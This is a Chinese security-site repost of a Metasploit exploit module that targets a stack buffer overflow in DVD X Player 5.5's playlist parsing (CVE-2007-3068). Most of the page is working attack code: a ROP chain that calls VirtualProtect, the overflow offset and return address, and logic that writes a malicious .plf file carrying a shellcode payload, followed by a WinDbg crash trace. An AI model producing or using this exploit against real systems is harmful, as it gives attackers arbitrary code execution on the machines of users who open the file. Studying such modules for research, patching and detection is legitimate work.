首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DVD X Player 5.5 .plf PlayList Buffer Overflow
来源:http://www.metasploit.com 作者:sinn3r 发布时间:2011-09-05  

##
# $Id: dvdx_plf_bof.rb 13673 2011-09-01 05:20:47Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::FILEFORMAT

 def initialize(info={})
  super(update_info(info,
   'Name'           => "DVD X Player 5.5 .plf PlayList Buffer Overflow",
   'Description'    => %q{
     This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and
    Standard.  By supplying a long string of data in a plf file (playlist), the
    MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,
    and then copy it on the stack without any proper bounds checking, which casues a
    buffer overflow, and results arbitrary code execution under the context of the user.

     This module has been designed to target common Windows systems such as:
    Windows XP SP2/SP3, Windows Vista, and Windows 7.
   },
   'License'        => MSF_LICENSE,
   'Version'        => "$Revision: 13673 $",
   'Author'         =>
    [
     'n00b',      #Initial discovery, poc for 4.1
     'D3r K0n!G', #Proof-of-concept for 5.5
     'sickness',  #ROP
     'sinn3r',    #Metasploit
    ],
   'References'     =>
    [
     [ 'CVE', '2007-3068' ],
     [ 'OSVDB', '36956' ],
     [ 'BID', '24278' ],
     [ 'URL', 'http://www.exploit-db.com/exploits/17745' ],
    ],
   'Payload'        =>
    {
     'Space'    => 1000,
     'BadChars' => "\x00\x0a\x0d\x1a",
     'StackAdjustment' => -3500,
    },
   'DefaultOptions'  =>
    {
     'ExitFunction' => "seh",  #none/process/seh
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [
      'DVD X Player 5.5 Standard / Pro',
      {
       'Offset' => 260,        #To EIP
       'Ret'    => 0x61626702, #POP EAX; RET [EPG.dll]
       'Max'    => 2000,       #Max buffer size
      }
     ],
    ],
   'Privileged'     => false,
   'DisclosureDate' => "Jun 02 2007",
   'DefaultTarget'  => 0))

   register_options(
    [
     OptString.new('FILENAME', [false, 'The file name', 'msf.plf'])
    ], self.class)
 end

 def exploit
  rop = [
   0x10011108,  #VirtualProtect IAT [SkinScrollBar.dll]
   0x616306ed,  #MOV EAX, DWORD PTR DS:[EAX]; RET [EPG.dll]
   0x616385d8,  #XCHG EAX,ESI; RETN 0 [EPG.dll]
   0x6162d202,  #POP EBP; RET [EPG.dll]
   0x6160cac8,  #PUSH ESP [EGP.dll]
   0x61626702,  #POP EAX; RET [EGP.dll]
   0xfffffaff,  #Value to negate, will become 0x00000501
   0x61627d9c,  #NEG EAX; RET [epg.dll]
   0x61640124,  #XCHG EAX,EBX; RET [EPG.dll]
   0x61626702,  #POP EAX; RET [EPG.dll]
   0xffffffc0,  #Value to negate, will become 0x00000040
   0x61627d9c,  #NEG EAX; RET [EPG.dll]
   0x61608ba2,  #XCHG EAX,EDX; RET [EPG.dll]
   0x6160b804,  #POP ECX; RET [EPG.dll]
   0x6164b001,  #Writable location [EPG.dll]
   0x6162e587,  #POP EDI; RET [EPG.dll]
   0x6163081d,  #ROP NOP  [EPG.dll]
   0x61626702,  #POP EAX; RET [EPG.dll]
   0x90909090,
   0x61620831,  #PUSHAD; RET [EPG.dll]
  ].pack('V*')

  buf  = ''
  buf << rand_text_alpha(target['Offset'])
  buf << [target.ret].pack('V')
  buf << rand_text_alpha(16)
  buf << rop
  buf << make_nops(15)
  buf << payload.encoded
  buf << rand_text_alpha(target['Max']-buf.length)

  print_status("Creating #{datastore['FILENAME']}...")
  file_create(buf)
 end
end

=begin
6400cd42 ffd3            call    ebx {SHLWAPI!PathFindFileNameA (77f6c19c)}
0:000> p
eax=0406a15c ebx=77f6c19c ecx=00001300 edx=040600d0 esi=00000001 edi=6405362c
eip=6400cd44 esp=0012f488 ebp=00eafce0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
MediaPlayerCtrl+0xcd44:
6400cd44 8b8dec000000    mov     ecx,dword ptr <Unloaded_ionInfo.dll>+0xeb (000000ec)[ebp] ss:0023:00eafdcc=040600d0
0:000> dd eax
0406a15c  41414141 41414141 41414141 41414141
0406a16c  41414141 41414141 41414141 41414141
0406a17c  41414141 41414141 41414141 41414141
0406a18c  41414141 41414141 41414141 41414141
0406a19c  41414141 41414141 41414141 41414141
0406a1ac  41414141 41414141 41414141 41414141
0406a1bc  41414141 41414141 41414141 41414141
0406a1cc  41414141 41414141 41414141 41414141
0:000> g
Breakpoint 2 hit
eax=0406a15c ebx=77f6c19c ecx=040600d0 edx=040600d0 esi=00000001 edi=6405362c
eip=6400cd4e esp=0012f47c ebp=00eafce0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
MediaPlayerCtrl+0xcd4e:
6400cd4e ff17            call    dword ptr [edi]      ds:0023:6405362c=6400d890
0:000> g
(464.c0c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00001389 ebx=040600d0 ecx=00000177 edx=0406a15c esi=0406af08 edi=00130000
eip=6400dd50 esp=0012f234 ebp=00000001 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
MediaPlayerCtrl!DllCreateObject+0x220:
6400dd50 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> !address 6400dd50
    64000000 : 64001000 - 0004e000
                    Type     01000000 MEM_IMAGE
                    Protect  00000020 PAGE_EXECUTE_READ
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageImage
                    FullPath C:\Program Files\Aviosoft\DVD X Player 5.5 Standard\MediaPlayerCtrl.dll
=end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel 'perf_count_sw_cp
·BroadWin WebAccess Client Mult
·Citrix Gateway ActiveX Control
·Apple QuickTime PICT PnSize Bu
·DVD X Player 5.5.0 Pro / Stand
·DragonflyBSD PortBind TCP (133
·mp3 Kaydet Local Buffer Overfl
·Musiccut210p Local Buffer Over
·Rainer v0.1 by localh0t
·Cerberus FTP Server 4.0.9.8 (R
·构造注入点后门代码(asp,aspx,p
·BisonFTP Server v3.5 (MKD) Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved